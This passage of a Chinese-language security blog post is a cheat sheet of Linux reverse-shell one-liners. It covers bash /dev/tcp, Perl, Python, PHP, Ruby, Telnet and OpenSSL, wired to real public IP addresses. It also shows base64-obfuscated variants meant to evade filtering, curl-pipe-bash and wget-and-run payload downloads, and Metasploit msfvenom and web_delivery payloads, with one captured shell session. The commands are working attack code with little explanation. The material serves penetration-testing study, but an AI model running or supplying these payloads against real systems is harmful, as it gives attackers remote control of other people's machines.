<h4 id="msf"><a href="#msf" class="headerlink" title="msf"></a>msf</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">msfvenom -l payloads | grep <span class="string">&quot;netcat&quot;</span> | awk <span class="string">&#x27;&#123;print $1&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="Bash反弹shell"><a href="#Bash反弹shell" class="headerlink" title="Bash反弹shell"></a>Bash反弹shell</h3><h4 id="方法一："><a href="#方法一：" class="headerlink" title="方法一："></a>方法一：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#被控端：</span></span><br><span class="line">bash -i &gt;&amp; /dev/tcp/47.101.214.85/6666 0&gt;&amp;1</span><br><span class="line"><span class="comment">#控制端：</span></span><br><span class="line">nc –lvvp 6666</span><br></pre></td></tr></table></figure>

<h4 id="方法二："><a href="#方法二：" class="headerlink" title="方法二："></a>方法二：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment">#被控端：</span></span><br><span class="line"><span class="built_in">exec</span> 5&lt;&gt;/dev/tcp/139.155.49.43/6666;<span class="built_in">cat</span> &lt;&amp;5 | <span class="keyword">while</span> <span class="built_in">read</span> line; <span class="keyword">do</span> <span class="variable">$line</span> 2&gt;&amp;5 &gt;&amp;5; <span class="keyword">done</span></span><br><span class="line"><span class="comment">#控制端：</span></span><br><span class="line">nc –lvvp 6666</span><br><span class="line"><span class="comment">#base64编码绕过：</span></span><br><span class="line">bash -c <span class="string">&quot;echo YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuMjE0Ljg1LzY2NjYgMD4mMQ==|base64 -d|bash -i&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#注意使用了两次管道符，base64 -d表示对base64编码进行解码。之后交给bash -i处理</span></span><br></pre></td></tr></table></figure>

<p>解释：</p>
<ul>
<li><code>exec 5&lt;&gt;/dev/tcp/139.155.49.43/6666;</code>就是定义<u>文件描述符</u>和<u><code>/dev/tcp/139.155.49.43/6666</code></u>输入输出的重定向</li>
<li><code>cat &lt;&amp;5</code>  ：就是获取从文件描述符<code>5</code>对应的输入</li>
<li><code>|while read line</code> ：就是将前面的语句当作输入，<code>read line</code>就是将这个输入存储到<code>line</code>变量，<code>while</code>是表示循环</li>
<li><code>do &amp;line</code>  ：就是执行变量里面的命令</li>
<li><code>2&gt;&amp;5 &gt;&amp;5;</code>：就是将错误输出和标准输出重定向到文件描述符5对应的对象</li>
<li>实际上这个句子和前面的非常类似：<code>bash -i &gt;&amp; /dev/tcp/10.10.1.11/6666 0&gt;&amp;1</code></li>
</ul>
<h5 id="为什么不直接执行反弹shell呢？而是base64加密再解密！"><a href="#为什么不直接执行反弹shell呢？而是base64加密再解密！" class="headerlink" title="为什么不直接执行反弹shell呢？而是base64加密再解密！"></a>为什么不直接执行反弹shell呢？而是base64加密再解密！</h5><p>因为linux反弹shell的命令有时候是会被一些特殊字符影响命令执行的结果。通过base64编码祛除特殊字符，再解码执行效果更好</p>
<h4 id="msf-1"><a href="#msf-1" class="headerlink" title="msf"></a>msf</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">msfvenom -p cmd/unix/reverse_bash lhost=10.10.1.11 lport=6666 -f raw</span><br><span class="line">msfvenom -l payloads | grep <span class="string">&quot;bash&quot;</span> | awk <span class="string">&#x27;&#123;print $1&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="Perl"><a href="#Perl" class="headerlink" title="Perl"></a>Perl</h3><h4 id="控制端"><a href="#控制端" class="headerlink" title="控制端"></a>控制端</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">perl -e <span class="string">&#x27;use Socket;$i=&quot;47.101.214.85&quot;;$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);&#125;;&#x27;</span></span><br><span class="line">解释：（不懂语法没关系，懂意思就行）</span><br><span class="line">use socket类似python的import socket，导入模块</span><br><span class="line"><span class="variable">$i</span>和<span class="variable">$p</span>分别是指定ip和端口</span><br><span class="line">后面通过方法连接ip和端口</span><br><span class="line">open打开标准输入重定向到&amp;S，open打开标准输出也重定向到&amp;S，标准错误也是</span><br></pre></td></tr></table></figure>

<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">perl -MIO -e <span class="string">&#x27;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;47.101.214.85:6666&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;&#x27;</span></span><br></pre></td></tr></table></figure>

<h4 id="被控端"><a href="#被控端" class="headerlink" title="被控端"></a>被控端</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">nc -lvvp 6666</span><br></pre></td></tr></table></figure>

<h4 id="msf-2"><a href="#msf-2" class="headerlink" title="msf"></a>msf</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">msfvenom -l payloads | grep <span class="string">&quot;perl&quot;</span> | awk <span class="string">&#x27;&#123;print $1&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="Curl"><a href="#Curl" class="headerlink" title="Curl"></a>Curl</h3><h4 id="vps"><a href="#vps" class="headerlink" title="vps"></a>vps</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">root@VM-0-2-ubuntu:~<span class="comment"># cat index.html</span></span><br><span class="line">bash -i &gt;&amp; /dev/tcp/139.155.49.43/6666 0&gt;&amp;1</span><br><span class="line">root@VM-0-2-ubuntu:~<span class="comment"># python3 -m http.server</span></span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...</span><br><span class="line">47.101.214.85 - - [03/Dec/2020 09:21:39] <span class="string">&quot;GET /1.sh HTTP/1.1&quot;</span> 200 -</span><br></pre></td></tr></table></figure>

<h4 id="target"><a href="#target" class="headerlink" title="target"></a>target</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">curl 139.155.49.43:8000|bash</span><br></pre></td></tr></table></figure>

<h4 id="result"><a href="#result" class="headerlink" title="result"></a>result</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">root@VM-0-2-ubuntu:~<span class="comment"># nc -lvvp 6666</span></span><br><span class="line">Listening on [0.0.0.0] (family 0, port 6666)</span><br><span class="line">Connection from 47.101.214.85 46370 received!</span><br><span class="line">root@iZuf6j06q5f1lZ:~<span class="comment">#</span></span><br></pre></td></tr></table></figure>

<img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211142341912.png" alt="image-20221114234118391" style="zoom:50%;" />

<h3 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h3><h4 id="Python一行命令反弹shell"><a href="#Python一行命令反弹shell" class="headerlink" title="Python一行命令反弹shell"></a>Python一行命令反弹shell</h4><h5 id="被控端-1"><a href="#被控端-1" class="headerlink" title="被控端"></a>被控端</h5><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;47.101.214.85&quot;,6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</span></span><br></pre></td></tr></table></figure>

<h5 id="控制端-1"><a href="#控制端-1" class="headerlink" title="控制端"></a>控制端</h5><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">nc -lvvp 6666</span><br></pre></td></tr></table></figure>

<h4 id="通过Msfvenom生成python反弹shell的payload"><a href="#通过Msfvenom生成python反弹shell的payload" class="headerlink" title="通过Msfvenom生成python反弹shell的payload"></a>通过Msfvenom生成python反弹shell的payload</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">msfvenom -p python/meterpreter/reverse_tcp LHOST=139.155.49.43 LPORT=6666 -f raw</span><br><span class="line"><span class="comment">#python执行刚刚msf生成的payload</span></span><br><span class="line">python -c <span class="string">&quot;刚刚生成的payload&quot;</span></span><br><span class="line"><span class="comment">#监听</span></span><br><span class="line">handler -p python/meterpreter/reverse_tcp -H 139.155.49.43 -P 6666</span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150136312.png" alt="image-20221115013650972"></p>
<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150136344.png" alt="image-20221115013657004"></p>
<h4 id="通过Web-delivery反弹shell："><a href="#通过Web-delivery反弹shell：" class="headerlink" title="通过Web delivery反弹shell："></a>通过Web delivery反弹shell：</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use exploit/multi/script/web_delivery</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; <span class="built_in">set</span> target 0</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; <span class="built_in">set</span> payload </span><br><span class="line">python/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; <span class="built_in">set</span> lport 8888</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; exploit –j</span><br><span class="line">python -c <span class="string">&quot;import sys;import ssl;u=__import__(&#x27;urllib&#x27;+&#123;2:&#x27;&#x27;,3:&#x27;.request&#x27;&#125;[sys.version_info[0]],fromlist=(&#x27;urlopen&#x27;,));r=u.urlopen(&#x27;http://139.155.49.43:8080/pWMAajktf&#x27;, context=ssl._create_unverified_context());exec(r.read());&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150138041.png" alt="image-20221115013759636"></p>
<h4 id="msf-3"><a href="#msf-3" class="headerlink" title="msf"></a>msf</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">msfvenom -l payloads | grep <span class="string">&quot;python&quot;</span> | awk <span class="string">&#x27;&#123;print $1&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h3><h4 id="PHP一行命令反弹shell"><a href="#PHP一行命令反弹shell" class="headerlink" title="PHP一行命令反弹shell"></a>PHP一行命令反弹shell</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">php -r <span class="string">&#x27;$sock=fsockopen(&quot;47.101.214.85&quot;,7777);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#x27;</span></span><br><span class="line">nc -lvvp 7777</span><br></pre></td></tr></table></figure>

<h4 id="Msfvenom生成php反弹shell脚本"><a href="#Msfvenom生成php反弹shell脚本" class="headerlink" title="Msfvenom生成php反弹shell脚本"></a>Msfvenom生成php反弹shell脚本</h4><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">攻击机生成payload</span></span><br><span class="line">msfvenom -p php/bind_php lport=6666 -f raw &gt; bind_php.php</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">攻击机起http服务</span></span><br><span class="line">python3 -m http.server</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">目标机器下载bind_php.php</span></span><br><span class="line">wget 124.223.217.243:8000/bind_php.php</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">攻击机msf设置选项，设置目标机器IP，端口，文件名，然后攻击机请求bind_php.php即可反弹shell</span></span><br><span class="line">如下图</span><br></pre></td></tr></table></figure>

<img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150143451.png" alt="image-20221115014313009" style="zoom:50%;" />

<h4 id="通过web-delivery反弹shell："><a href="#通过web-delivery反弹shell：" class="headerlink" title="通过web_delivery反弹shell："></a>通过web_delivery反弹shell：</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">use exploit/multi/script/web_delivery</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; <span class="built_in">set</span> target 1</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; <span class="built_in">set</span> payload </span><br><span class="line">php/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/script/web_delivery) &gt; exploit –j</span><br><span class="line">php -d allow_url_fopen=<span class="literal">true</span> -r <span class="string">&quot;eval(file_get_contents(&#x27;http://139.155.49.43:8080/RRfKpX&#x27;, false, stream_context_create([&#x27;ssl&#x27;=&gt;[&#x27;verify_peer&#x27;=&gt;false,&#x27;verify_peer_name&#x27;=&gt;false]])));&quot;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150145768.png" alt="image-20221115014503319"></p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">wget 139.155.49.43/s.php -O /tmp/s.php &amp;&amp; php /tmp/s.php</span><br></pre></td></tr></table></figure>

<h4 id="msf-4"><a href="#msf-4" class="headerlink" title="msf"></a>msf</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">msfvenom -l payload | grep <span class="string">&quot;php&quot;</span> | awk <span class="string">&#x27;&#123;print($1)&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="Ruby"><a href="#Ruby" class="headerlink" title="Ruby"></a>Ruby</h3><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">msfvenom -p cmd/unix/bind_ruby lport=6666 -f raw</span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150145712.png" alt="image-20221115014549291"></p>
<h4 id="msf-5"><a href="#msf-5" class="headerlink" title="msf"></a>msf</h4><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">msfvenom -l payload | grep <span class="string">&quot;ruby&quot;</span> | awk <span class="string">&#x27;&#123;print($1)&#125;&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="Telnet"><a href="#Telnet" class="headerlink" title="Telnet"></a>Telnet</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">nc -lvvp 5555</span><br><span class="line">nc -lvvp 6666</span><br><span class="line">目标机： </span><br><span class="line">telnet 47.101.214.85 5555 | /bin/bash | telnet 47.101.214.85 6666</span><br></pre></td></tr></table></figure>

<img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150146160.png" alt="image-20221115014633739" style="zoom:50%;" />

<p>目标机执行</p>
<img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150146595.png" alt="image-20221115014651270" style="zoom:50%;" />

<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">nc -lvvp 6666</span><br></pre></td></tr></table></figure>

<img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150147055.png" alt="image-20221115014709720" style="zoom:50%;" />

<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">目标机：</span><br><span class="line"><span class="built_in">rm</span> -f a &amp;&amp; <span class="built_in">mknod</span> a p &amp;&amp; telnet 47.101.214.85 6666 0&lt;a | /bin/bash 1&gt;a</span><br><span class="line"><span class="built_in">rm</span> -f a;<span class="built_in">mknod</span> a p;telnet 47.101.214.85 6666 0&lt;a | /bin/bash 1&gt;a</span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150147940.png" alt="image-20221115014731562"></p>
<h3 id="OpenSSL"><a href="#OpenSSL" class="headerlink" title="OpenSSL"></a>OpenSSL</h3><p>openssl反弹443端口，流量加密传输</p>
<ol>
<li>在远程攻击主机上生成秘钥文件</li>
</ol>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>在远程攻击主机上启动监视器</li>
</ol>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">openssl s_server -quiet -key key.pem -cert cert.pem -port 443</span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150148174.png" alt="image-20221115014824719"></p>
<ol start="3">
<li>在目标机上反弹shell</li>
</ol>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="built_in">mkfifo</span> /tmp/s; /bin/sh -i &lt; /tmp/s 2&gt;&amp;1 | openssl s_client -quiet -connect &lt;ATTACKER-IP&gt;:&lt;PORT&gt; &gt; /tmp/s; <span class="built_in">rm</span> /tmp/s</span><br></pre></td></tr></table></figure>

<p><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202211150148123.png" alt="image-20221115014848759"></p>
<h3 id="Java反弹shell常用"><a href="#Java反弹shell常用" class="headerlink" title="Java反弹shell常用"></a>Java反弹shell常用</h3><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">bash -c &#123;<span class="built_in">echo</span>,X&#125;|&#123;<span class="built_in">base64</span>,-d&#125;|&#123;bash,-i&#125; </span><br><span class="line">其中X地方我们要换成我们需要执行的命令：</span><br><span class="line">bash -i &gt;&amp; /dev/tcp/47.101.214.85/6666 0&gt;&amp;1</span><br><span class="line">还要将这个命令进行<span class="built_in">base64</span>编码，再塞进去</span><br></pre></td></tr></table></figure>















<hr>
<h2 id="refer"><a href="#refer" class="headerlink" title="refer"></a>refer</h2><blockquote>
<ul>
<li><a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.cnblogs.com/old-path-white-cloud/p/11685558.html">linux mkfifo命令基本用法 - 故道丶白云 - 博客园 (cnblogs.com)</a></li>
<li></li>
</ul>
</blockquote>
<blockquote>
<p><strong>声明：</strong></p>
<ol>
<li><p>若文章存在错误，望诸君不吝指正^</p>
</li>
<li><p>部分笔记由于年代久远，做的笔记找不到最初是引用谁的，若是不允许引用转载，请联系我</p>
</li>
</ol>
</blockquote>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="http://gungnir.top/">晚上十一点睡觉</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://gungnir.top/posts/20558/">http://gungnir.top/posts/20558/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow noreferrer" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://gungnir.top" target="_blank">晚上十一点睡觉のBlog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Web%E5%AE%89%E5%85%A8/">Web安全</a><a class="post-meta__tags" href="/tags/Linux/">Linux</a><a class="post-meta__tags" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">命令执行</a><a class="post-meta__tags" href="/tags/%E5%8F%8D%E5%BC%B9shell/">反弹shell</a></div><div class="post_share"><div class="social-share" data-image="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237560.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/posts/46563/"><img class="prev-cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237563.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">正则表达式</div></div></a></div><div class="next-post pull-right"><a href="/posts/61475/"><img class="next-cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237530.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">0x09 - Web安全基础-Windows反弹shell</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/posts/61475/" title="0x09 - Web安全基础-Windows反弹shell"><img class="cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237530.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-11-14</div><div class="title">0x09 - Web安全基础-Windows反弹shell</div></div></a></div><div><a href="/posts/34204/" title="0x09 - Web安全基础-命令执行GetShell"><img class="cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237573.jpeg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-11-14</div><div class="title">0x09 - Web安全基础-命令执行GetShell</div></div></a></div><div><a href="/posts/5917/" title="常见Webshell"><img class="cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237575.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-11-13</div><div class="title">常见Webshell</div></div></a></div><div><a href="/posts/65078/" title="Web安全基础知识"><img class="cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237521.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-10-16</div><div class="title">Web安全基础知识</div></div></a></div><div><a href="/posts/50900/" title="0x10 - 漏洞扫描器"><img class="cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208211308751.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-11-16</div><div class="title">0x10 - 漏洞扫描器</div></div></a></div><div><a href="/posts/22121/" title="Fuzz测试"><img class="cover" src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208182237530.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-09-22</div><div class="title">Fuzz测试</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div id="twikoo-wrap"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://alvin-note.oss-cn-hangzhou.aliyuncs.com/Markdown/202208151640204.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">晚上十一点睡觉</div><div class="author-info__description">晚上十一点睡觉的个人博客，个人笔记及日志，最近在学习网络安全和Python</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">57</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">42</div></a></div><a id="card-info-btn" target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/11pmsleep"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/11pmsleep" rel="external nofollow noreferrer" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:860637048@qq.com" rel="external nofollow noreferrer" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="tencent://AddContact/?fromId=45&amp;fromSubId=1&amp;subcmd=all&amp;uin=860637048" rel="external nofollow noreferrer" target="_blank" title="qq"><i class="fab fa-qq"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">笔记迁移整理中~~~以前习惯有道云记笔记，整理知识也算沉淀自己的一部分吧·· 加油··stay passionate and never say die!</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux%E6%A0%87%E5%87%86%E6%96%87%E4%BB%B6%E6%8F%8F%E8%BF%B0%E7%AC%A6"><span class="toc-number">1.</span> <span class="toc-text">Linux标准文件描述符</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%8F%8F%E8%BF%B0%E7%AC%A6%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.</span> <span class="toc-text">文件描述符简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9B%B4%E6%94%B9%E6%A0%87%E5%87%86%E8%BE%93%E5%87%BA%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="toc-number">1.2.</span> <span class="toc-text">更改标准输出的位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9B%B4%E6%94%B9%E6%A0%87%E5%87%86%E8%BE%93%E5%85%A5%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="toc-number">1.3.</span> <span class="toc-text">更改标准输入的位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E9%85%8D%E8%87%AA%E5%B7%B1%E7%9A%84%E6%96%87%E4%BB%B6%E6%8F%8F%E8%BF%B0%E7%AC%A6"><span class="toc-number">1.4.</span> <span class="toc-text">分配自己的文件描述符</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dev-null"><span class="toc-number">1.5.</span> <span class="toc-text">&#x2F;dev&#x2F;null</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%87%8D%E5%AE%9A%E5%90%91"><span class="toc-number">2.</span> <span class="toc-text">重定向</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell%E7%9A%84%E6%9C%AC%E8%B4%A8"><span class="toc-number">3.</span> <span class="toc-text">反弹shell的本质</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">3.1.</span> <span class="toc-text">什么是反弹shell</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A2%AB%E6%8E%A7%E7%AB%AF%EF%BC%9A"><span class="toc-number">3.1.1.</span> <span class="toc-text">被控端：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A7%E5%88%B6%E7%AB%AF%EF%BC%9A"><span class="toc-number">3.1.2.</span> <span class="toc-text">控制端：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E6%8E%A7%E5%88%B6%E7%AB%AF%E5%92%8C%E8%A2%AB%E6%8E%A7%E7%AB%AF%E4%B9%8B%E9%97%B4%E7%9A%84%E4%BA%A4%E4%BA%92%EF%BC%88%E5%A4%9A%E7%A7%8D%E5%BD%A2%E5%BC%8F%EF%BC%89"><span class="toc-number">3.2.</span> <span class="toc-text">实现控制端和被控端之间的交互（多种形式）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8A%8A%E8%A2%AB%E6%8E%A7%E7%AB%AF%E7%9A%84%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E8%BE%93%E5%87%BA%E9%87%8D%E5%AE%9A%E5%90%91%E5%88%B0%E6%8E%A7%E5%88%B6%E7%AB%AF%EF%BC%9A"><span class="toc-number">3.2.1.</span> <span class="toc-text">把被控端的交互式shell输出重定向到控制端：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8A%8A%E6%8E%A7%E5%88%B6%E7%AB%AF%E7%9A%84%E8%BE%93%E5%85%A5%E9%87%8D%E5%AE%9A%E5%90%91%E5%88%B0%E8%A2%AB%E6%8E%A7%E7%AB%AF%E7%9A%84%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%EF%BC%9A"><span class="toc-number">3.2.2.</span> <span class="toc-text">把控制端的输入重定向到被控端的交互式shell：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BB%93%E5%90%88%E4%B8%A4%E6%9D%A1%E8%AF%AD%E5%8F%A5"><span class="toc-number">3.2.3.</span> <span class="toc-text">结合两条语句</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%8D%E6%B7%BB%E4%B8%8A%E9%94%99%E8%AF%AF%E8%BE%93%E5%87%BA%EF%BC%8C%E5%BD%A2%E6%88%90%E6%9C%80%E7%BB%88%E7%9A%84%E5%8F%8D%E5%BC%B9shell%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-number">3.2.4.</span> <span class="toc-text">再添上错误输出，形成最终的反弹shell的命令</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8D%E5%90%8C%E6%96%B9%E6%B3%95%E5%8F%8D%E5%BC%B9shell%E7%9A%84%E5%91%BD%E4%BB%A4"><span class="toc-number">4.</span> <span class="toc-text">不同方法反弹shell的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NC"><span class="toc-number">4.1.</span> <span class="toc-text">NC</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#NC%E6%AD%A3%E5%90%91Shell"><span class="toc-number">4.1.1.</span> <span class="toc-text">NC正向Shell</span></a></li><li 